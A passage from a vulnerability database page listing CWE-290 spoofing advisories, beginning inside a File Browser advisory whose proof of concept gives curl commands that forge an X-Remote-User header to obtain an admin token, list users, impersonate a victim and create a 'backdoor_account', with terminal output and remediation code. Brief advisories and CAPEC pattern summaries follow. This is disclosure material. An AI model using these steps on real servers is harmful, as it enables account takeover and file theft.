password check\n  |-\u003e printToken(w, r, d, user, ...)    |\n        |-\u003e jwt.NewWithClaims(HS256, claims{user: admin, perm: {admin: true}})\n        |-\u003e token.SignedString(key)     -\u003e  valid admin JWT returned to attacker\n```\n\n## Proof of Concept\n\nHere is Log testing using Low Privileges Account attacker, get forbidden\nLogin as low priv user then get the auth token `\"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjp7ImlkIjozLCJsb2NhbGUiOiIiLCJ2aWV3TW9kZSI6Imxpc3QiLCJzaW5nbGVDbGljayI6ZmFsc2UsInJlZGlyZWN0QWZ0ZXJDb3B5TW92ZSI6ZmFsc2UsInBlcm0iOnsiYWRtaW4iOmZhbHNlLCJleGVjdXRlIjp0cnVlLCJjcmVhdGUiOmZhbHNlLCJyZW5hbWUiOmZhbHNlLCJtb2RpZnkiOmZhbHNlLCJkZWxldGUiOmZhbHNlLCJzaGFyZSI6ZmFsc2UsImRvd25sb2FkIjp0cnVlfSwiY29tbWFuZHMiOlsibHMiXSwibG9ja1Bhc3N3b3JkIjpmYWxzZSwiaGlkZURvdGZpbGVzIjpmYWxzZSwiZGF0ZUZvcm1hdCI6ZmFsc2UsInVzZXJuYW1lIjoiYXR0YWNrZXIiLCJhY2VFZGl0b3JUaGVtZSI6IiJ9LCJpc3MiOiJGaWxlIEJyb3dzZXIiLCJleHAiOjE3NzMwMjc2ODksImlhdCI6MTc3MzAyMDQ4OX0.NN0SqBr8lFj7QUACY2770gaGXZhBZ2qJZHDJJ7vQbNM\"`\n\n```\nroot@LAPTOP-VUMRCEKO:~# curl -s http://localhost:8085/api/settings \\\n  -H \"X-Auth: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjp7ImlkIjozLCJsb2NhbGUiOiIiLCJ2aWV3TW9kZSI6Imxpc3QiLCJzaW5nbGVDbGljayI6ZmFsc2UsInJlZGlyZWN0QWZ0ZXJDb3B5TW92ZSI6ZmFsc2UsInBlcm0iOnsiYWRtaW4iOmZhbHNlLCJleGVjdXRlIjp0cnVlLCJjcmVhdGUiOmZhbHNlLCJyZW5hbWUiOmZhbHNlLCJtb2RpZnkiOmZhbHNlLCJkZWxldGUiOmZhbHNlLCJzaGFyZSI6ZmFsc2UsImRvd25sb2FkIjp0cnVlfSwiY29tbWFuZHMiOlsibHMiXSwibG9ja1Bhc3N3b3JkIjpmYWxzZSwiaGlkZURvdGZpbGVzIjpmYWxzZSwiZGF0ZUZvcm1hdCI6ZmFsc2UsInVzZXJuYW1lIjoiYXR0YWNrZXIiLCJhY2VFZGl0b3JUaGVtZSI6IiJ9LCJpc3MiOiJGaWxlIEJyb3dzZXIiLCJleHAiOjE3NzMwMjc2ODksImlhdCI6MTc3MzAyMDQ4OX0.NN0SqBr8lFj7QUACY2770gaGXZhBZ2qJZHDJJ7vQbNM\"\n403 Forbidden\nroot@LAPTOP-VUMRCEKO:~#\nroot@LAPTOP-VUMRCEKO:~#\nroot@LAPTOP-VUMRCEKO:~# FORGED_TOKEN=$(curl -s -X POST http://localhost:8085/api/login \\\n  -H \"X-Remote-User: admin\")\nroot@LAPTOP-VUMRCEKO:~#\nroot@LAPTOP-VUMRCEKO:~# curl -s http://localhost:8085/api/settings \\\n  -H \"X-Auth: $FORGED_TOKEN\" | python3 -m json.tool\n{\n    \"signup\": false,\n    \"hideLoginButton\": true,\n    \"createUserDir\": false,\n    \"minimumPasswordLength\": 12,\n    \"userHomeBasePath\": \"/users\",\n    \"defaults\": {\n        \"scope\": \".\",\n        \"locale\": \"en\",\n        \"viewMode\": \"mosaic\",\n        \"singleClick\": false,\n        \"redirectAfterCopyMove\": true,\n        \"sorting\": {\n            \"by\": \"\",\n            \"asc\": false\n        },\n        \"perm\": {\n            \"admin\": false,\n            \"execute\": true,\n            \"create\": true,\n            \"rename\": true,\n            \"modify\": true,\n            \"delete\": true,\n            \"share\": true,\n            \"download\": true\n        },\n        \"commands\": [],\n        \"hideDotfiles\": false,\n        \"dateFormat\": false,\n        \"aceEditorTheme\": \"\"\n    },\n    \"authMethod\": \"proxy\",\n    \"rules\": [],\n    \"branding\": {\n        \"name\": \"\",\n        \"disableExternal\": false,\n        \"disableUsedPercentage\": false,\n        \"files\": \"\",\n        \"theme\": \"\",\n        \"color\": \"\"\n    },\n    \"tus\": {\n        \"chunkSize\": 10485760,\n        \"retryCount\": 5\n    },\n    \"shell\": [\n        \"/bin/sh\",\n        \"-c\"\n    ],\n    \"commands\": {\n        \"after_copy\": [],\n        \"after_delete\": [],\n        \"after_rename\": [],\n        \"after_save\": [],\n        \"after_upload\": [],\n        \"before_copy\": [],\n        \"before_delete\": [],\n        \"before_rename\": [],\n        \"before_save\": [],\n        \"before_upload\": []\n    }\n}\nroot@LAPTOP-VUMRCEKO:~#\n```\n\u003cimg width=\"1487\" height=\"757\" alt=\"image\" src=\"https://github.com/user-attachments/assets/a777321e-14a4-4720-9f8e-423d5f7cdf74\" /\u003e\n\n\n### Prerequisites\n\n- FileBrowser with proxy auth enabled:\n  ```bash\n  filebrowser config set --auth.method=proxy --auth.header=X-Remote-User\n  ```\n- Server is reachable directly (not exclusively behind the reverse proxy)\n\n### Step 1: Confirm attacker (non-admin) is blocked\n\n```bash\n# Using a legitimate non-admin JWT token:\ncurl -s http://localhost:8085/api/settings \\\n  -H \"X-Auth: \u003cATTACKER_JWT_TOKEN\u003e\"\n```\n\n**Result:** `403 Forbidden` \u2014 non-admin users cannot access `/api/settings`\n\n### Step 2: Forge admin identity \u2014 no credentials needed\n\n```bash\n# Just one header, no password:\nFORGED_TOKEN=$(curl -s -X POST http://localhost:8085/api/login \\\n  -H \"X-Remote-User: admin\")\n\necho \"$FORGED_TOKEN\"\n# eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjp7ImlkIjoxLC... (608 bytes)\n```\n\n**Result:** Valid JWT token returned for admin user (ID: 1, `perm.admin: true`)\n\n### Step 3: Access admin-only endpoints with forged token\n\n```bash\n# Read full server configuration (admin-only):\ncurl -s http://localhost:8085/api/settings \\\n  -H \"X-Auth: $FORGED_TOKEN\"\n```\n\n**Result:** `200 OK` - complete server settings returned:\n\n```json\n{\n    \"authMethod\": \"proxy\",\n    \"shell\": [\"/bin/sh\", \"-c\"],\n    \"signup\": false,\n    \"defaults\": { \"perm\": { \"admin\": false, \"execute\": true, ... } },\n    ...\n}\n```\n\n### Step 4: Enumerate all user accounts\n\n```bash\ncurl -s http://localhost:8085/api/users \\\n  -H \"X-Auth: $FORGED_TOKEN\"\n```\n\n**Result:** All user accounts with full details (usernames, permissions, scopes, commands)\n\n### Step 5: Impersonate any other user\n\n```bash\n# Impersonate \"testuser\" \u2014 access their files without knowing their password:\nVICTIM_TOKEN=$(curl -s -X POST http://localhost:8085/api/login \\\n  -H \"X-Remote-User: testuser\")\n\ncurl -s http://localhost:8085/api/resources/ \\\n  -H \"X-Auth: $VICTIM_TOKEN\"\n```\n\n**Result:** Full file listing of testuser\u0027s scope\n\n### Step 6: Auto-create a new user account\n\n```bash\n# This username doesn\u0027t exist \u2014 server creates it automatically:\nNEW_TOKEN=$(curl -s -X POST http://localhost:8085/api/login \\\n  -H \"X-Remote-User: backdoor_account\")\n```\n\n**Result:** New user `backdoor_account` created in the database with default permissions, JWT returned\n\n## Validated Results\n\nTested against `filebrowser/filebrowser:latest` Docker image on 2026-03-09:\n\n| Test | Result |\n|------|--------|\n| Attacker token (non-admin) -\u003e `GET /api/settings` | **`403 Forbidden`** (blocked) |\n| Forged header `X-Remote-User: admin` -\u003e `POST /api/login` | **`200 OK`** \u2014 valid admin JWT (608 bytes) |\n| Forged admin token -\u003e `GET /api/settings` | **`200 OK`** \u2014 full server config returned |\n| Forged admin token -\u003e `GET /api/users` | **`200 OK`** \u2014 all user accounts listed |\n| Forged header `X-Remote-User: testuser` | **`200 OK`** \u2014 testuser JWT, files accessible |\n| Forged header `X-Remote-User: nonexistent_user` | **`200 OK`** \u2014 new user auto-created, JWT returned |\n\n## Impact\n\nAn unauthenticated attacker who can reach the FileBrowser instance directly can:\n\n1. **Full admin takeover** \u2014 impersonate the admin user and gain complete control\n2. **Read all server settings** \u2014 shell configuration, permissions, branding, rules\n3. **Enumerate and impersonate all users** \u2014 access every user\u0027s files without credentials\n4. **Create unlimited backdoor accounts** \u2014 auto-creation generates persistent accounts\n5. **Modify server configuration** \u2014 enable command execution, change shell, alter rules\n6. **Chain with other vulnerabilities** \u2014 gain admin access -\u003e enable shell mode -\u003e achieve RCE\n\n**Attack cost:** Zero credentials. One HTTP header.\n\n## Suggested Remediation\n\n### Fix 1: Add trusted proxy IP validation (recommended)\n\n```go\ntype ProxyAuth struct {\n    Header         string   `json:\"header\"`\n    TrustedProxies []string `json:\"trustedProxies\"` // New: list of trusted proxy IPs/CIDRs\n}\n\nfunc (a ProxyAuth) Auth(r *http.Request, usr users.Store, setting *settings.Settings, srv *settings.Server) (*users.User, error) {\n    // Verify request originates from a trusted reverse proxy\n    clientIP := realip.FromRequest(r)\n    if !a.isTrustedProxy(clientIP) {\n        return nil, fmt.Errorf(\"proxy auth: request from untrusted source %s\", clientIP)\n    }\n\n    username := r.Header.Get(a.Header)\n    if username == \"\" {\n        return nil, os.ErrPermission\n    }\n\n    user, err := usr.Get(srv.Root, username)\n    if errors.Is(err, fberrors.ErrNotExist) {\n        if a.AutoCreateUsers {  // Make opt-in\n            return a.createUser(usr, setting, srv, username)\n        }\n        return nil, os.ErrPermission\n    }\n    return user, err\n}\n```\n\n### Fix 2: Make auto-user-creation opt-in\n\nAdd a configuration flag `auth.proxy.createUsers` (default: `false`) so administrators must explicitly enable automatic account creation.\n\n### Fix 3: Documentation warning\n\nClearly document that when using proxy auth:\n- FileBrowser **MUST NOT** be directly accessible from untrusted networks\n- Bind to `127.0.0.1` or use firewall rules to ensure only the reverse proxy can reach it\n- The reverse proxy **MUST** strip/overwrite the configured header from client requests\n\n## References\n\n- **Source file:** https://github.com/filebrowser/filebrowser/blob/main/auth/proxy.go\n- **Login handler:** https://github.com/filebrowser/filebrowser/blob/main/http/auth.go#L121-L137\n- **CWE-287:** https://cwe.mitre.org/data/definitions/287.html\n- **CWE-290:** https://cwe.mitre.org/data/definitions/290.html\n- **OWASP Authentication Cheat Sheet:** https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html",
  "id": "GHSA-xqp3-jq6g-x3qm",
  "modified": "2026-07-10T19:27:13Z",
  "published": "2026-07-10T19:27:13Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/filebrowser/filebrowser/security/advisories/GHSA-xqp3-jq6g-x3qm"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54089"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/filebrowser/filebrowser"
    },
    {
      "type": "WEB",
      "url": "https://github.com/filebrowser/filebrowser/blob/main/auth/proxy.go"
    },
    {
      "type": "WEB",
      "url": "https://github.com/filebrowser/filebrowser/blob/main/http/auth.go#L121-L137"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "File Browser: Authentication Bypass via Proxy Auth Header Forgery"
}

GHSA-XRGF-QP7C-883G

Vulnerability from github – Published: 2024-01-11 00:30 – Updated: 2025-11-04 21:31
VLAI
Details

This issue was addressed by improving Face ID anti-spoofing models. This issue is fixed in iOS 17 and iPadOS 17. A 3D model constructed to look like the enrolled user may authenticate via Face ID.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-41069"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-290"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-01-10T22:15:49Z",
    "severity": "MODERATE"
  },
  "details": "This issue was addressed by improving Face ID anti-spoofing models. This issue is fixed in iOS 17 and iPadOS 17. A 3D model constructed to look like the enrolled user may authenticate via Face ID.",
  "id": "GHSA-xrgf-qp7c-883g",
  "modified": "2025-11-04T21:31:03Z",
  "published": "2024-01-11T00:30:25Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41069"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/en-us/HT213938"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/kb/HT213938"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-XRW6-GWF8-VVR9

Vulnerability from github – Published: 2026-04-08 19:52 – Updated: 2026-04-09 19:05
VLAI
Summary
Tmds.DBus: malicious D-Bus peers can spoof signals, exhaust file descriptor resources, and cause denial of service
Details

Tmds.DBus and Tmds.DBus.Protocol are vulnerable to malicious D-Bus peers. A peer on the same bus can spoof signals by impersonating the owner of a well-known name, exhaust system resources or cause file descriptor spillover by sending messages with an excessive number of Unix file descriptors, and crash the application by sending malformed message bodies that cause unhandled exceptions on the SynchronizationContext.

Patches

The vulnerabilities are fixed in version 0.92.0. For Tmds.DBus.Protocol, the fixes are also backported to 0.21.3.

Workarounds

There are no known workarounds. Users should upgrade to a patched version.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Tmds.DBus"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.92.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Tmds.DBus.Protocol"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.21.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Tmds.DBus.Protocol"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.22.0"
            },
            {
              "fixed": "0.92.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-39959"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-290",
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-08T19:52:58Z",
    "nvd_published_at": "2026-04-09T17:16:30Z",
    "severity": "HIGH"
  },
  "details": "Tmds.DBus and Tmds.DBus.Protocol are vulnerable to malicious D-Bus peers. A peer on the same bus can spoof signals by impersonating the owner of a well-known name, exhaust system resources or cause file descriptor spillover by sending messages with an excessive number of Unix file descriptors, and crash the application by sending malformed message bodies that cause unhandled exceptions on the SynchronizationContext.\n\n### Patches\n\nThe vulnerabilities are fixed in version 0.92.0.\nFor Tmds.DBus.Protocol, the fixes are also backported to 0.21.3.\n\n### Workarounds\n\nThere are no known workarounds. Users should upgrade to a patched version.",
  "id": "GHSA-xrw6-gwf8-vvr9",
  "modified": "2026-04-09T19:05:46Z",
  "published": "2026-04-08T19:52:58Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/tmds/Tmds.DBus/security/advisories/GHSA-xrw6-gwf8-vvr9"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39959"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/tmds/Tmds.DBus"
    },
    {
      "type": "WEB",
      "url": "https://github.com/tmds/Tmds.DBus/releases/tag/rel%2F0.21.3"
    },
    {
      "type": "WEB",
      "url": "https://github.com/tmds/Tmds.DBus/releases/tag/rel%2F0.92.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Tmds.DBus: malicious D-Bus peers can spoof signals, exhaust file descriptor resources, and cause denial of service"
}

GHSA-XVXM-X86G-723R

Vulnerability from github – Published: 2025-11-07 00:30 – Updated: 2025-11-12 21:31
VLAI
Details

Inappropriate implementation in Omnibox in Google Chrome on Android prior to 141.0.7390.54 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page. (Chromium security severity: Medium)

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-11209"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-290"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-11-06T22:15:38Z",
    "severity": "HIGH"
  },
  "details": "Inappropriate implementation in Omnibox in Google Chrome on Android prior to 141.0.7390.54 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page. (Chromium security severity: Medium)",
  "id": "GHSA-xvxm-x86g-723r",
  "modified": "2025-11-12T21:31:04Z",
  "published": "2025-11-07T00:30:30Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11209"
    },
    {
      "type": "WEB",
      "url": "https://chromereleases.googleblog.com/2025/09/stable-channel-update-for-desktop_30.html"
    },
    {
      "type": "WEB",
      "url": "https://issues.chromium.org/issues/438226517"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-XW94-4RMP-7QW5

Vulnerability from github – Published: 2022-03-07 00:00 – Updated: 2022-03-17 00:03
VLAI
Details

A DNS rebinding issue in ReadyMedia (formerly MiniDLNA) before 1.3.1 allows a remote web server to exfiltrate media files.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-26505"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-290"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-03-06T07:15:00Z",
    "severity": "HIGH"
  },
  "details": "A DNS rebinding issue in ReadyMedia (formerly MiniDLNA) before 1.3.1 allows a remote web server to exfiltrate media files.",
  "id": "GHSA-xw94-4rmp-7qw5",
  "modified": "2022-03-17T00:03:11Z",
  "published": "2022-03-07T00:00:40Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-26505"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00005.html"
    },
    {
      "type": "WEB",
      "url": "https://security.gentoo.org/glsa/202311-12"
    },
    {
      "type": "WEB",
      "url": "https://sourceforge.net/p/minidlna/git/ci/c21208508dbc131712281ec5340687e5ae89e940"
    },
    {
      "type": "WEB",
      "url": "https://www.openwall.com/lists/oss-security/2022/03/03/1"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2022/03/06/1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

No mitigation information available for this CWE.

CAPEC-21: Exploitation of Trusted Identifiers

An adversary guesses, obtains, or "rides" a trusted identifier (e.g. session ID, resource ID, cookie, etc.) to perform authorized actions under the guise of an authenticated user or service.

CAPEC-22: Exploiting Trust in Client

An attack of this type exploits vulnerabilities in client/server communication channel authentication and data integrity. It leverages the implicit trust a server places in the client, or more importantly, that which the server believes is the client. An attacker executes this type of attack by communicating directly with the server where the server believes it is communicating only with a valid client. There are numerous variations of this type of attack.

CAPEC-459: Creating a Rogue Certification Authority Certificate

An adversary exploits a weakness resulting from using a hashing algorithm with weak collision resistance to generate certificate signing requests (CSR) that contain collision blocks in their "to be signed" parts. The adversary submits one CSR to be signed by a trusted certificate authority then uses the signed blob to make a second certificate appear signed by said certificate authority. Due to the hash collision, both certificates, though different, hash to the same value and so the signed blob works just as well in the second certificate. The net effect is that the adversary's second X.509 certificate, which the Certification Authority has never seen, is now signed and validated by that Certification Authority.

CAPEC-461: Web Services API Signature Forgery Leveraging Hash Function Extension Weakness

An adversary utilizes a hash function extension/padding weakness, to modify the parameters passed to the web service requesting authentication by generating their own call in order to generate a legitimate signature hash (as described in the notes), without knowledge of the secret token sometimes provided by the web service.

CAPEC-473: Signature Spoof

An attacker generates a message or datablock that causes the recipient to believe that the message or datablock was generated and cryptographically signed by an authoritative or reputable source, misleading a victim or victim operating system into performing malicious actions.

CAPEC-476: Signature Spoofing by Misrepresentation

An attacker exploits a weakness in the parsing or display code of the recipient software to generate a data blob containing a supposedly valid signature, but the signer's identity is falsely represented, which can lead to the attacker manipulating the recipient software or its victim user to perform compromising actions.

CAPEC-59: Session Credential Falsification through Prediction

This attack targets predictable session ID in order to gain privileges. The attacker can predict the session ID used during a transaction to perform spoofing and session hijacking.

CAPEC-60: Reusing Session IDs (aka Session Replay)

This attack targets the reuse of valid session ID to spoof the target system in order to gain privileges. The attacker tries to reuse a stolen session ID used previously during a transaction to perform spoofing and session hijacking. Another name for this type of attack is Session Replay.

CAPEC-667: Bluetooth Impersonation AttackS (BIAS)

An adversary disguises the MAC address of their Bluetooth enabled device to one for which there exists an active and trusted connection and authenticates successfully. The adversary can then perform malicious actions on the target Bluetooth device depending on the target’s capabilities.

CAPEC-94: Adversary in the Middle (AiTM)

An adversary targets the communication between two components (typically client and server), in order to alter or obtain data from transactions. A general approach entails the adversary placing themself within the communication channel between the two components.